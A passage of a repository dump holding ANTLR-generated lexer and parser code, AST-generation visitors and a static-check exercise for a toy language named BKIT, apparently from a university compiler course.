\"ASSIGN\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n def action(self, localctx:RuleContext, ruleIndex:int, actionIndex:int):\n if self._actions is None:\n actions = dict()\n actions[2] = 
self.UNCLOSE_STRING_action \n actions[25] = self.String_literal_action \n self._actions = actions\n action = self._actions.get(ruleIndex, None)\n if action is not None:\n action(localctx, actionIndex)\n else:\n raise Exception(\"No registered action for:\" + str(ruleIndex))\n\n\n def UNCLOSE_STRING_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 0:\n\n y = str(self.text);\n self.text = y[1:]\n \n \n\n def String_literal_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 1:\n\n y = str(self.text)\n self.text = y[1:-1]\n \n \n\n\n" }, { "alpha_fraction": 0.682758629322052, "alphanum_fraction": 0.692307710647583, "avg_line_length": 38.29166793823242, "blob_id": "4bfb930c768ca82a850cf767feedf66557c684dc", "content_id": "9760ae2e5a1646d1c1be2d4e8e8130d2e19195f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1885, "license_type": "no_license", "max_line_length": 100, "num_lines": 48, "path": "/AST/assignment2/src/main/bkit/astgen/ASTGeneration1.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# class ASTGeneration(MPVisitor):\n \n# def visitProgram(self,ctx:MPParser.ProgramContext):\n# return self.visitVardecls(ctx.vardecls()) + 1 if ctx.vardecls() else 1\n\n# def visitVardecls(self,ctx:MPParser.VardeclsContext):\n# return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail()) + 1\n\n# def visitVardecltail(self,ctx:MPParser.VardecltailContext): \n# if ctx.vardecl() and ctx.vardecltail():\n# return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail()) + 1\n# return 1\n\n# def visitVardecl(self,ctx:MPParser.VardeclContext): \n# return self.visitIds(ctx.ids()) + self.visitMptype(ctx.mptype()) + 1\n\n# def visitMptype(self,ctx:MPParser.MptypeContext):\n# return 1\n\n# def visitIds(self,ctx:MPParser.IdsContext):\n# return 1 + self.visitIds(ctx.ids()) if ctx.ids() else 1\n\n\nfrom BKITVisitor import 
BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\n\nclass ASTGeneration(BKITVisitor):\n \n def visitProgram(self,ctx:BKITParser.ProgramContext):\n return self.visitVardecls(ctx.vardecls()) + 1 if ctx.vardecls() else 1\n\n def visitVardecls(self,ctx:BKITParser.VardeclsContext):\n return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail()) + 1\n\n def visitVardecltail(self,ctx:BKITParser.VardecltailContext): \n if ctx.vardecl() and ctx.vardecltail():\n return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail()) + 1\n return 1\n\n def visitVardecl(self,ctx:BKITParser.VardeclContext):\n return self.visitIds(ctx.ids()) + self.visitMptype(ctx.mptype()) + 1\n\n def visitMptype(self,ctx:BKITParser.MptypeContext):\n return 1\n\n def visitIds(self,ctx:BKITParser.IdsContext):\n return 1 + self.visitIds(ctx.ids()) if ctx.ids() else 1" }, { "alpha_fraction": 0.4738195836544037, "alphanum_fraction": 0.5107477307319641, "avg_line_length": 29.723163604736328, "blob_id": "5ffe58e1137966d8003f93484276b8e6465b31f6", "content_id": "53b87ea7d02652caa04a9a3475d49fd0c7fba257", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5443, "license_type": "no_license", "max_line_length": 103, "num_lines": 177, "path": "/LexicalAnalysis/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3E\")\n buf.write(\"\\7\\4\\2\\t\\2\\3\\2\\3\\2\\3\\2\\2\\2\\3\\2\\2\\2\\2\\5\\2\\4\\3\\2\\2\\2\\4\\5\")\n buf.write(\"\\3\\2\\2\\2\\5\\3\\3\\2\\2\\2\\2\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n 
grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"'Body'\", \"'Break'\", \"'Continue'\", \n \"'Do'\", \"'Else'\", \"'ElSelf'\", \"'ElseIf'\", \"'EndIf'\", \n \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \"'If'\", \n \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \n \"'-.'\", \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \n \"'&&'\", \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \n \"'>='\", \"'=\\\\='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \n \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \n \"';'\", \"','\" ]\n\n symbolicNames = [ \"<INVALID>\", \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\", \"WS\", \"Literal\", \"Integer_literal\", \n \"Float_literal\", \"Boolean_literal\", \"String_literal\", \n \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \n \"ELSEIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \n \"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \"VAR\", \n \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \n \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \"STAR_FLOAT\", \n \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \n \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \n \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \n \"LESS_FLOAT\", \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \n \"GREATER_OR_EQUAL_FLOAT\", 
\"LEFT_PAREN\", \"RIGHT_PARENT\", \n \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \n \"COLON\", \"DOT\", \"SEMI\", \"COMMA\" ]\n\n RULE_program = 0\n\n ruleNames = [ \"program\" ]\n\n EOF = Token.EOF\n REAL_NUMBER=1\n ID=2\n ILLEGAL_ESCAPE=3\n UNCLOSE_STRING=4\n COMMENT=5\n UNTERMINATED_COMMENT=6\n ERROR_CHAR=7\n WS=8\n Literal=9\n Integer_literal=10\n Float_literal=11\n Boolean_literal=12\n String_literal=13\n BODY=14\n BREAK=15\n CONTINUE=16\n DO=17\n ELSE=18\n ELSELF=19\n ELSEIF=20\n ENDBODY=21\n ENDFOR=22\n ENDWHILE=23\n FOR=24\n FUNCTION=25\n IF=26\n PARAMETER=27\n RETURN=28\n THEN=29\n VAR=30\n WHILE=31\n TRUE=32\n FALSE=33\n ENDDO=34\n PLUS_INT=35\n PLUS_FLOAT=36\n MINUS_INT=37\n MINUS_FLOAT=38\n STAR_INT=39\n STAR_FLOAT=40\n DIV_INT=41\n DIV_FLOAT=42\n MOD=43\n NOT=44\n AND=45\n OR=46\n EQUAL=47\n NOT_EQUAL_INT=48\n LESS_INT=49\n GREATER_INT=50\n LESS_OR_EQUAL_INT=51\n GREATER_OR_EQUAL_INT=52\n NOT_EQUAL_FLOAT=53\n LESS_FLOAT=54\n GREATER_FLOAT=55\n LESS_OR_EQUAL_FLOAT=56\n GREATER_OR_EQUAL_FLOAT=57\n LEFT_PAREN=58\n RIGHT_PARENT=59\n LEFT_BRACKET=60\n RIGHT_BRACKET=61\n LEFT_BRACE=62\n RIGHT_BRACE=63\n COLON=64\n DOT=65\n SEMI=66\n COMMA=67\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterProgram\" ):\n listener.enterProgram(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitProgram\" ):\n listener.exitProgram(self)\n\n\n\n\n def program(self):\n\n 
localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n try:\n self.enterOuterAlt(localctx, 1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n\n\n" }, { "alpha_fraction": 0.6632016897201538, "alphanum_fraction": 0.6632016897201538, "avg_line_length": 35.871795654296875, "blob_id": "50dfc0515d91dbecf1d8bcdecbcf0c27491b5847", "content_id": "8104107e2c59289c53f1360ff764494f2cc3bee8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1443, "license_type": "no_license", "max_line_length": 114, "num_lines": 39, "path": "/AST/assignment2/src/main/bkit/astgen/ASTGeneration4.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# class ASTGeneration(MPVisitor):\n \n# def visitProgram(self,ctx:MPParser.ProgramContext):\n# return Program(list(map(lambda var_decl: self.visitVardecl(var_decl), ctx.var_decl())))\n\n# def visitVardecl(self,ctx:MPParser.VardeclContext): \n# var_type = self.visitMptype(ctx.mptype())\n# return list(map(lambda x: VarDecl(x, var_type), self.visitIds(ctx.ids())))\n\n# def visitMptype(self,ctx:MPParser.MptypeContext):\n# if ctx.INTTYPE():\n# return IntType()\n# return FloatType()\n\n# def visitIds(self,ctx:MPParser.IdsContext):\n# return list(map(lambda x: Id(x.getText()), ctx.ID()))\n\nfrom BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\n\n\nclass ASTGeneration(BKITVisitor):\n \n def visitProgram(self,ctx:BKITParser.ProgramContext):\n from functools import reduce\n return Program(list(reduce(lambda prog, var_decl: prog + self.visitVardecl(var_decl), ctx.vardecl(), [])))\n\n def visitVardecl(self,ctx:BKITParser.VardeclContext): \n var_type = self.visitMptype(ctx.mptype())\n return list(map(lambda x: VarDecl(x, var_type), 
self.visitIds(ctx.ids())))\n\n def visitMptype(self,ctx:BKITParser.MptypeContext):\n if ctx.INTTYPE():\n return IntType()\n return FloatType()\n\n def visitIds(self,ctx:BKITParser.IdsContext):\n return list(map(lambda x: Id(x.getText()), ctx.ID()))\n \n" }, { "alpha_fraction": 0.6707482933998108, "alphanum_fraction": 0.6707482933998108, "avg_line_length": 31, "blob_id": "8876daf4856122e240ed14308155f2043200c548", "content_id": "23682dd08a2bf39347ed921a289683fc4dee5b14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 735, "license_type": "no_license", "max_line_length": 129, "num_lines": 23, "path": "/name_binding/ques1.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class StaticCheck(Visitor):\n \n def visitProgram(self,ctx:Program,o:object):\n from functools import reduce\n reduce(lambda lst, x: self.visitVarDecl(x, lst) if isinstance(x, VarDecl) else self.visitConstDecl(x, lst), ctx.decl ,[])\n\n def visitVarDecl(self,ctx:VarDecl,o:object):\n if ctx.name not in o:\n raise RedeclaredDeclaration(ctx.name)\n return ctx.name\n \n\n def visitConstDecl(self,ctx:ConstDecl,o:object):\n if ctx.name not in o:\n raise RedeclaredDeclaration(ctx.name)\n return ctx.name\n\n\n def visitIntType(self,ctx:IntType,o:object): pass\n\n def visitFloatType(self,ctx:FloatType,o:object):pass\n\n def visitIntLit(self,ctx:IntLit,o:object):pass" }, { "alpha_fraction": 0.29786643385887146, "alphanum_fraction": 0.5583660006523132, "avg_line_length": 57.15207290649414, "blob_id": "113da2073873aa8f85494a803c84673dfb5ca8e6", "content_id": "1384476cf95f097b7f6e77429206b97724fbfa29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25263, "license_type": "no_license", "max_line_length": 112, "num_lines": 434, "path": "/SyntaxAnalysis/src/main/bkit/parser/.antlr/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from 
/home/nguyendat/Documents/projects/PPL/SyntaxAnalysis/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2E\")\n buf.write(\"\\u022b\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\4.\")\n buf.write(\"\\t.\\4/\\t/\\4\\60\\t\\60\\4\\61\\t\\61\\4\\62\\t\\62\\4\\63\\t\\63\\4\\64\")\n buf.write(\"\\t\\64\\4\\65\\t\\65\\4\\66\\t\\66\\4\\67\\t\\67\\48\\t8\\49\\t9\\4:\\t:\")\n buf.write(\"\\4;\\t;\\4<\\t<\\4=\\t=\\4>\\t>\\4?\\t?\\4@\\t@\\4A\\tA\\4B\\tB\\4C\\t\")\n buf.write(\"C\\4D\\tD\\4E\\tE\\4F\\tF\\4G\\tG\\4H\\tH\\4I\\tI\\4J\\tJ\\4K\\tK\\4L\\t\")\n buf.write(\"L\\4M\\tM\\4N\\tN\\4O\\tO\\4P\\tP\\4Q\\tQ\\4R\\tR\\4S\\tS\\4T\\tT\\3\\2\")\n buf.write(\"\\3\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\7\\3\\u00b1\\n\\3\\f\\3\\16\\3\\u00b4\")\n buf.write(\"\\13\\3\\3\\4\\3\\4\\7\\4\\u00b8\\n\\4\\f\\4\\16\\4\\u00bb\\13\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\5\\3\\5\\7\\5\\u00c1\\n\\5\\f\\5\\16\\5\\u00c4\\13\\5\\3\\5\\5\\5\\u00c7\")\n buf.write(\"\\n\\5\\3\\5\\3\\5\\3\\6\\3\\6\\3\\6\\3\\6\\7\\6\\u00cf\\n\\6\\f\\6\\16\\6\\u00d2\")\n buf.write(\"\\13\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\3\\7\\7\\7\\u00dd\\n\")\n 
buf.write(\"\\7\\f\\7\\16\\7\\u00e0\\13\\7\\3\\7\\3\\7\\3\\b\\3\\b\\3\\t\\6\\t\\u00e7\\n\")\n buf.write(\"\\t\\r\\t\\16\\t\\u00e8\\3\\t\\3\\t\\3\\n\\3\\n\\3\\13\\3\\13\\3\\f\\3\\f\\3\")\n buf.write(\"\\r\\3\\r\\5\\r\\u00f5\\n\\r\\3\\16\\3\\16\\5\\16\\u00f9\\n\\16\\3\\16\\6\")\n buf.write(\"\\16\\u00fc\\n\\16\\r\\16\\16\\16\\u00fd\\3\\17\\3\\17\\7\\17\\u0102\\n\")\n buf.write(\"\\17\\f\\17\\16\\17\\u0105\\13\\17\\3\\20\\6\\20\\u0108\\n\\20\\r\\20\\16\")\n buf.write(\"\\20\\u0109\\3\\20\\3\\20\\5\\20\\u010e\\n\\20\\3\\20\\5\\20\\u0111\\n\")\n buf.write(\"\\20\\3\\21\\3\\21\\3\\21\\3\\22\\3\\22\\3\\22\\3\\23\\3\\23\\3\\23\\3\\24\")\n buf.write(\"\\3\\24\\3\\24\\5\\24\\u011f\\n\\24\\3\\25\\3\\25\\3\\26\\3\\26\\3\\27\\3\")\n buf.write(\"\\27\\3\\27\\3\\27\\5\\27\\u0129\\n\\27\\3\\27\\6\\27\\u012c\\n\\27\\r\\27\")\n buf.write(\"\\16\\27\\u012d\\3\\30\\6\\30\\u0131\\n\\30\\r\\30\\16\\30\\u0132\\3\\31\")\n buf.write(\"\\3\\31\\3\\31\\3\\31\\5\\31\\u0139\\n\\31\\3\\31\\6\\31\\u013c\\n\\31\\r\")\n buf.write(\"\\31\\16\\31\\u013d\\3\\32\\3\\32\\3\\32\\5\\32\\u0143\\n\\32\\3\\33\\3\")\n buf.write(\"\\33\\3\\34\\3\\34\\5\\34\\u0149\\n\\34\\3\\35\\3\\35\\7\\35\\u014d\\n\\35\")\n buf.write(\"\\f\\35\\16\\35\\u0150\\13\\35\\3\\35\\3\\35\\3\\35\\3\\36\\3\\36\\3\\36\")\n buf.write(\"\\3\\36\\3\\36\\3\\37\\3\\37\\3\\37\\3\\37\\3\\37\\3\\37\\3 \\3 \\3 \\3 \\3\")\n buf.write(\" \\3 \\3 \\3 \\3 \\3!\\3!\\3!\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3#\\3#\\3#\\3\")\n buf.write(\"#\\3#\\3#\\3#\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3%\\3%\\3%\\3%\\3%\\3%\\3&\\3\")\n buf.write(\"&\\3&\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\\'\\3\\'\\3\\'\\3\\'\\3\\'\\3\\'\\3\\'\\3\")\n buf.write(\"(\\3(\\3(\\3(\\3)\\3)\\3)\\3)\\3)\\3)\\3)\\3)\\3)\\3*\\3*\\3*\\3+\\3+\\3\")\n buf.write(\"+\\3+\\3+\\3+\\3+\\3+\\3+\\3+\\3,\\3,\\3,\\3,\\3,\\3,\\3,\\3-\\3-\\3-\\3\")\n buf.write(\"-\\3-\\3.\\3.\\3.\\3.\\3/\\3/\\3/\\3/\\3/\\3/\\3\\60\\3\\60\\3\\60\\3\\60\")\n 
buf.write(\"\\3\\60\\3\\61\\3\\61\\3\\61\\3\\61\\3\\61\\3\\61\\3\\62\\3\\62\\3\\62\\3\\62\")\n buf.write(\"\\3\\62\\3\\62\\3\\63\\3\\63\\3\\64\\3\\64\\3\\64\\3\\65\\3\\65\\3\\66\\3\\66\")\n buf.write(\"\\3\\66\\3\\67\\3\\67\\38\\38\\38\\39\\39\\3:\\3:\\3:\\3;\\3;\\3<\\3<\\3\")\n buf.write(\"=\\3=\\3=\\3>\\3>\\3>\\3?\\3?\\3?\\3@\\3@\\3@\\3A\\3A\\3B\\3B\\3C\\3C\\3\")\n buf.write(\"C\\3D\\3D\\3D\\3E\\3E\\3E\\3E\\3F\\3F\\3F\\3G\\3G\\3G\\3H\\3H\\3H\\3H\\3\")\n buf.write(\"I\\3I\\3I\\3I\\3J\\3J\\3K\\3K\\3L\\3L\\3M\\3M\\3N\\3N\\3O\\3O\\3P\\3P\\3\")\n buf.write(\"Q\\3Q\\3R\\3R\\3S\\3S\\3T\\3T\\4\\u00d0\\u00de\\2U\\3\\3\\5\\4\\7\\5\\t\")\n buf.write(\"\\6\\13\\7\\r\\b\\17\\t\\21\\n\\23\\2\\25\\2\\27\\2\\31\\2\\33\\2\\35\\2\\37\")\n buf.write(\"\\2!\\2#\\2%\\2\\'\\2)\\2+\\2-\\2/\\2\\61\\2\\63\\13\\65\\f\\67\\r9\\16;\")\n buf.write(\"\\17=\\20?\\21A\\22C\\23E\\24G\\25I\\26K\\27M\\30O\\31Q\\32S\\33U\\34\")\n buf.write(\"W\\35Y\\36[\\37] _!a\\\"c#e$g%i&k\\'m(o)q*s+u,w-y.{/}\\60\\177\")\n buf.write(\"\\61\\u0081\\62\\u0083\\63\\u0085\\64\\u0087\\65\\u0089\\66\\u008b\")\n buf.write(\"\\67\\u008d8\\u008f9\\u0091:\\u0093;\\u0095<\\u0097=\\u0099>\\u009b\")\n buf.write(\"?\\u009d@\\u009fA\\u00a1B\\u00a3C\\u00a5D\\u00a7E\\3\\2\\16\\4\\3\")\n buf.write(\"\\n\\f\\16\\17\\4\\2\\60\\60AA\\5\\2\\13\\f\\16\\17\\\"\\\"\\3\\2c|\\3\\2C\\\\\")\n buf.write(\"\\3\\2\\62;\\4\\2GGgg\\3\\2\\60\\60\\t\\2))^^ddhhppttvv\\7\\2\\n\\f\\16\")\n buf.write(\"\\17$$))^^\\5\\2\\62;CHch\\3\\2\\629\\2\\u0233\\2\\3\\3\\2\\2\\2\\2\\5\")\n buf.write(\"\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\\2\\2\\2\\13\\3\\2\\2\\2\\2\\r\\3\\2\")\n buf.write(\"\\2\\2\\2\\17\\3\\2\\2\\2\\2\\21\\3\\2\\2\\2\\2\\63\\3\\2\\2\\2\\2\\65\\3\\2\\2\")\n buf.write(\"\\2\\2\\67\\3\\2\\2\\2\\29\\3\\2\\2\\2\\2;\\3\\2\\2\\2\\2=\\3\\2\\2\\2\\2?\\3\")\n buf.write(\"\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\")\n buf.write(\"\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2O\\3\\2\\2\\2\\2Q\\3\\2\\2\\2\\2\")\n 
buf.write(\"S\\3\\2\\2\\2\\2U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\\2Y\\3\\2\\2\\2\\2[\\3\\2\\2\\2\")\n buf.write(\"\\2]\\3\\2\\2\\2\\2_\\3\\2\\2\\2\\2a\\3\\2\\2\\2\\2c\\3\\2\\2\\2\\2e\\3\\2\\2\")\n buf.write(\"\\2\\2g\\3\\2\\2\\2\\2i\\3\\2\\2\\2\\2k\\3\\2\\2\\2\\2m\\3\\2\\2\\2\\2o\\3\\2\")\n buf.write(\"\\2\\2\\2q\\3\\2\\2\\2\\2s\\3\\2\\2\\2\\2u\\3\\2\\2\\2\\2w\\3\\2\\2\\2\\2y\\3\")\n buf.write(\"\\2\\2\\2\\2{\\3\\2\\2\\2\\2}\\3\\2\\2\\2\\2\\177\\3\\2\\2\\2\\2\\u0081\\3\\2\")\n buf.write(\"\\2\\2\\2\\u0083\\3\\2\\2\\2\\2\\u0085\\3\\2\\2\\2\\2\\u0087\\3\\2\\2\\2\\2\")\n buf.write(\"\\u0089\\3\\2\\2\\2\\2\\u008b\\3\\2\\2\\2\\2\\u008d\\3\\2\\2\\2\\2\\u008f\")\n buf.write(\"\\3\\2\\2\\2\\2\\u0091\\3\\2\\2\\2\\2\\u0093\\3\\2\\2\\2\\2\\u0095\\3\\2\\2\")\n buf.write(\"\\2\\2\\u0097\\3\\2\\2\\2\\2\\u0099\\3\\2\\2\\2\\2\\u009b\\3\\2\\2\\2\\2\\u009d\")\n buf.write(\"\\3\\2\\2\\2\\2\\u009f\\3\\2\\2\\2\\2\\u00a1\\3\\2\\2\\2\\2\\u00a3\\3\\2\\2\")\n buf.write(\"\\2\\2\\u00a5\\3\\2\\2\\2\\2\\u00a7\\3\\2\\2\\2\\3\\u00a9\\3\\2\\2\\2\\5\\u00ad\")\n buf.write(\"\\3\\2\\2\\2\\7\\u00b5\\3\\2\\2\\2\\t\\u00be\\3\\2\\2\\2\\13\\u00ca\\3\\2\")\n buf.write(\"\\2\\2\\r\\u00d8\\3\\2\\2\\2\\17\\u00e3\\3\\2\\2\\2\\21\\u00e6\\3\\2\\2\\2\")\n buf.write(\"\\23\\u00ec\\3\\2\\2\\2\\25\\u00ee\\3\\2\\2\\2\\27\\u00f0\\3\\2\\2\\2\\31\")\n buf.write(\"\\u00f4\\3\\2\\2\\2\\33\\u00f6\\3\\2\\2\\2\\35\\u00ff\\3\\2\\2\\2\\37\\u0107\")\n buf.write(\"\\3\\2\\2\\2!\\u0112\\3\\2\\2\\2#\\u0115\\3\\2\\2\\2%\\u0118\\3\\2\\2\\2\")\n buf.write(\"\\'\\u011e\\3\\2\\2\\2)\\u0120\\3\\2\\2\\2+\\u0122\\3\\2\\2\\2-\\u0128\")\n buf.write(\"\\3\\2\\2\\2/\\u0130\\3\\2\\2\\2\\61\\u0138\\3\\2\\2\\2\\63\\u0142\\3\\2\")\n buf.write(\"\\2\\2\\65\\u0144\\3\\2\\2\\2\\67\\u0148\\3\\2\\2\\29\\u014a\\3\\2\\2\\2\")\n buf.write(\";\\u0154\\3\\2\\2\\2=\\u0159\\3\\2\\2\\2?\\u015f\\3\\2\\2\\2A\\u0168\\3\")\n buf.write(\"\\2\\2\\2C\\u016b\\3\\2\\2\\2E\\u0170\\3\\2\\2\\2G\\u0177\\3\\2\\2\\2I\\u017e\")\n 
buf.write(\"\\3\\2\\2\\2K\\u0184\\3\\2\\2\\2M\\u018b\\3\\2\\2\\2O\\u0194\\3\\2\\2\\2\")\n buf.write(\"Q\\u0198\\3\\2\\2\\2S\\u01a1\\3\\2\\2\\2U\\u01a4\\3\\2\\2\\2W\\u01ae\\3\")\n buf.write(\"\\2\\2\\2Y\\u01b5\\3\\2\\2\\2[\\u01ba\\3\\2\\2\\2]\\u01be\\3\\2\\2\\2_\\u01c4\")\n buf.write(\"\\3\\2\\2\\2a\\u01c9\\3\\2\\2\\2c\\u01cf\\3\\2\\2\\2e\\u01d5\\3\\2\\2\\2\")\n buf.write(\"g\\u01d7\\3\\2\\2\\2i\\u01da\\3\\2\\2\\2k\\u01dc\\3\\2\\2\\2m\\u01df\\3\")\n buf.write(\"\\2\\2\\2o\\u01e1\\3\\2\\2\\2q\\u01e4\\3\\2\\2\\2s\\u01e6\\3\\2\\2\\2u\\u01e9\")\n buf.write(\"\\3\\2\\2\\2w\\u01eb\\3\\2\\2\\2y\\u01ed\\3\\2\\2\\2{\\u01f0\\3\\2\\2\\2\")\n buf.write(\"}\\u01f3\\3\\2\\2\\2\\177\\u01f6\\3\\2\\2\\2\\u0081\\u01f9\\3\\2\\2\\2\")\n buf.write(\"\\u0083\\u01fb\\3\\2\\2\\2\\u0085\\u01fd\\3\\2\\2\\2\\u0087\\u0200\\3\")\n buf.write(\"\\2\\2\\2\\u0089\\u0203\\3\\2\\2\\2\\u008b\\u0207\\3\\2\\2\\2\\u008d\\u020a\")\n buf.write(\"\\3\\2\\2\\2\\u008f\\u020d\\3\\2\\2\\2\\u0091\\u0211\\3\\2\\2\\2\\u0093\")\n buf.write(\"\\u0215\\3\\2\\2\\2\\u0095\\u0217\\3\\2\\2\\2\\u0097\\u0219\\3\\2\\2\\2\")\n buf.write(\"\\u0099\\u021b\\3\\2\\2\\2\\u009b\\u021d\\3\\2\\2\\2\\u009d\\u021f\\3\")\n buf.write(\"\\2\\2\\2\\u009f\\u0221\\3\\2\\2\\2\\u00a1\\u0223\\3\\2\\2\\2\\u00a3\\u0225\")\n buf.write(\"\\3\\2\\2\\2\\u00a5\\u0227\\3\\2\\2\\2\\u00a7\\u0229\\3\\2\\2\\2\\u00a9\")\n buf.write(\"\\u00aa\\5\\u009bN\\2\\u00aa\\u00ab\\3\\2\\2\\2\\u00ab\\u00ac\\5\\u009d\")\n 